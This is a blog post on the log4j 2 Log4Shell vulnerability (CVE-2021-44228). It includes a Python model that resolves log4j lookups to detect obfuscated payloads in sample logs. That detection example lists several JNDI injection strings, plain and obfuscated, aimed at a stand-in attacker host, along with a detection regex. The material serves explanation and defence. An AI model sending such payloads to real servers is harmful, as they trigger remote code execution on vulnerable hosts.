CVE-2021-44228
Yesterday the world learned about a new critical vulnerability, affecting millions of production machines, in one of the most popular and widely used logging libraries in the Java / JVM world: Apache log4j 2.
It was discovered by Chen Zhaojun, from Alibaba. There is plenty of technical information available already, so I won't go into detail here.
In short, it exploits a log4j feature called lookups: a log message may contain variables of the form ${prefix:key} that log4j substitutes at logging time, for instance to resolve a server name only known at runtime. One of those prefixes is jndi, which makes log4j perform a JNDI request (typically LDAP or RMI) to whatever URL the variable names. A malicious user only has to get a string such as ${jndi:ldap://<attacker host>/x} into something the server logs; log4j evaluates it, contacts the attacker's server, and that server can answer with a reference to a class file that the JVM downloads and runs, for instance one that opens a remote shell the attacker can use to control the host machine.
The original go-to write-up is: https://www.randori.com/blog/cve-2021-44228/
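To make the mechanism above concrete, here is an added example in Python; it is not code from this post or from the log4j project. It is a simplified model of log4j's ${...} lookup substitution in which the jndi lookup records the URL it would have contacted instead of connecting. Run over a few constructed access-log lines (documentation-only IP addresses), it shows two things the paragraph only states: a logged string turns into an outbound JNDI request, and a naive search for the literal "${jndi:" catches only the plain payload, while resolving lookups the way log4j does also catches obfuscated variants built from lower, upper, env and ${::-x} default-value lookups. The log lines, addresses, and the small set of lookup handlers are assumptions for the example; real log4j supports more prefixes.

```python
"""Simplified model of log4j 2.x ${...} message lookups (added example, not log4j code).

Shows why a logged string becomes an outbound JNDI request, why obfuscated
payloads defeat naive "${jndi:" matching, and how resolving the lookups the way
log4j would gives a more robust detector.
"""
import re

# Constructed sample access-log lines for this example (not real traffic).
# 203.0.113.x and 198.51.100.9 are documentation-only addresses.
LOG_LINES = [
    '203.0.113.5 "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.7 "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.9:1389/a}"',
    '203.0.113.8 "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://198.51.100.9:1389/a}"',
    '203.0.113.9 "GET / HTTP/1.1" 200 '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.9:1389/a}"',
    '203.0.113.10 "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi:rmi://198.51.100.9:1099/obj}"',
    '203.0.113.11 "GET /pay HTTP/1.1" 200 "price is ${amount:-$10}"',
]

# The obvious signature: only matches the unobfuscated payload.
NAIVE_PATTERN = re.compile(r"\$\{jndi:", re.IGNORECASE)


class LookupModel:
    """Resolves nested ${prefix:key:-default} variables roughly the way log4j's
    StrSubstitutor does; a jndi: lookup is only recorded, never executed."""

    def __init__(self, env=None):
        self.env = env or {}          # stands in for the real env: lookup (assumed)
        self.jndi_targets = []

    def render(self, message):
        self.jndi_targets = []
        text, _, _ = self._walk(message, 0, nested=False)
        return text

    def _walk(self, s, i, nested):
        out = []
        while i < len(s):
            if s.startswith("${", i):
                inner, j, closed = self._walk(s, i + 2, nested=True)
                if not closed:            # unterminated "${": left as literal text
                    out.append(s[i:])
                    return "".join(out), len(s), False
                out.append(self._lookup(inner))   # inner variables already resolved
                i = j
            elif nested and s[i] == "}":
                return "".join(out), i + 1, True
            else:
                out.append(s[i])
                i += 1
        return "".join(out), i, not nested

    def _lookup(self, body):
        # "${name:-default}" splits on the first ":-"; the name is "prefix:key".
        name, sep, default = body.partition(":-")
        default = default if sep else None
        prefix, _, key = name.partition(":")
        if prefix == "lower":
            return key.lower()
        if prefix == "upper":
            return key.upper()
        if prefix == "env" and key in self.env:
            return self.env[key]
        if prefix == "jndi":
            # Real log4j would connect to this URL and load whatever comes back.
            self.jndi_targets.append(key)
            return "<jndi:" + key + ">"
        # Unknown or unresolvable lookup: use the default, else keep the literal.
        return default if default is not None else "${" + body + "}"


def jndi_targets(line, env=None):
    """Return the JNDI URLs log4j would contact when logging this line."""
    model = LookupModel(env)
    model.render(line)
    return list(model.jndi_targets)


def scan_log(lines):
    """Map line index -> JNDI targets for every line that would trigger a lookup."""
    hits = {}
    for idx, line in enumerate(lines):
        targets = jndi_targets(line)
        if targets:
            hits[idx] = targets
    return hits


def naive_hits(lines):
    """Line indexes flagged by the literal "${jndi:" signature."""
    return [i for i, line in enumerate(lines) if NAIVE_PATTERN.search(line)]


if __name__ == "__main__":
    print("naive regex flags:", naive_hits(LOG_LINES))
    for idx, targets in scan_log(LOG_LINES).items():
        print(f"line {idx}: logging this would contact {targets}")
```

The naive signature flags one of the five malicious lines; the resolver flags all five, including the one that spells "jndi" entirely out of ${::-x} default values, and leaves the benign ${amount:-$10} alone. This is also why a quick WAF or grep rule for the literal string is a stopgap, not a fix: the attacker controls the encoding, the substitution engine does not care.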
This will probably cause a lot of pain, for a number of reasons: not only the vulnerability itself, but also a chain of events that broadens its impact.
- The JNDI lookup feature is enabled by default: message lookups are on in every affected log4j2 release (2.0-beta9 through 2.14.1), so an application needs no special configuration to be vulnerable.
- The vulnerability allows RCE (Remote Code Execution) on servers running log4j2 (I can't think of a library used more frequently in the Java world).
- Any application that writes attacker-supplied data to its logs can be exploited, and most do: HTTP headers such as User-Agent, usernames, form fields, URL parameters, anything that ends up in a log statement.
- As I write this, a release with the fix (it will be 2.15) still hasn't been published, half a month after the issue was reported; that's quite a long time. There is probably a reason for this, most likely that it is a community-maintained project.
- An early fix was developed, but security researchers found it was incomplete and could still be bypassed, so the release had to wait.
- The Apache project seemingly didn't issue any emergency warning, even once the vulnerability was public and could be exploited maliciously (for instance in ransomware attacks).
- There should probably be a process in place guaranteeing that widely used software gets audited properly and exhaustively, and there should also be an economic incentive for this.
- Developers are doing a great job building awesome tools like log4j in their spare time; however, they don't live on thin air, and their effort should be compensated, not only via donations but through a mechanism that strengthens controls, especially at a time when attacking and exploiting 0-days is so profitable for cyber criminals (ransomware).
- This could also be a wake-up call for the foundations maintaining free software (as in free speech) to start incorporating economic incentives into the software lifecycle that prevent all this pain and increase their reactivity, not if, but when a new vulnerability is found (bug hunting, security audits...).